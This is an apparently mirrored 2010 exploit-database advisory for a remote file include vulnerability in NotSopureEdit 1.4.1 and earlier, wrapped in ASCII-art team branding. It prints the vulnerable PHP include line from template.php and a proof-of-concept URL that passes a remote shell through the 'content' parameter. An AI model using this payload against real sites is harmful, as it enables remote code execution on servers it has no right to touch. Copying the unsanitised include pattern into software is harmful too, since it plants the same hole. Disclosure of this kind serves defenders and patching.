NotSopureEdit <= 1.4.1 Remote File Include Vulnerability

2010-03-23T00:00:00
ID SECURITYVULNS:DOC:23432
Type securityvulns
Reporter Securityvulns
Modified 2010-03-23T00:00:00

Description

======================================================== NotSopureEdit <= 1.4.1 Remote File Include Vulnerability ========================================================

[+] NotSopureEdit <= 1.4.1 Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ 1 1 /' \ /'`\ /\ \ /'`\ 0 0 /\, \ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ 1 1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'_\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1 1 \ \\ \\ \\\ \ \ \_/\ \\\ \__\\ \____/\ \\ 0 0 \//\//\//\ \\ \// \// \/__/ \/___/ \// 1 1 \ \_/ >> Exploit database separated by exploit 0 0 \// type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm cr4wl3r member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r [+] My id: http://inj3ct0r.com/author/945 [+] Original: http://inj3ct0r.com/exploits/11393 [+] Download : http://code.google.com/p/notsopureedit/downloads/list

[+] Code [template.php]: <?php include($content); ?>

[+] PoC: [path]/templates/template.php?content=[Shell]

[+] Greetz: All member inj3ct0r.com

Inj3ct0r.com [2010-03-22]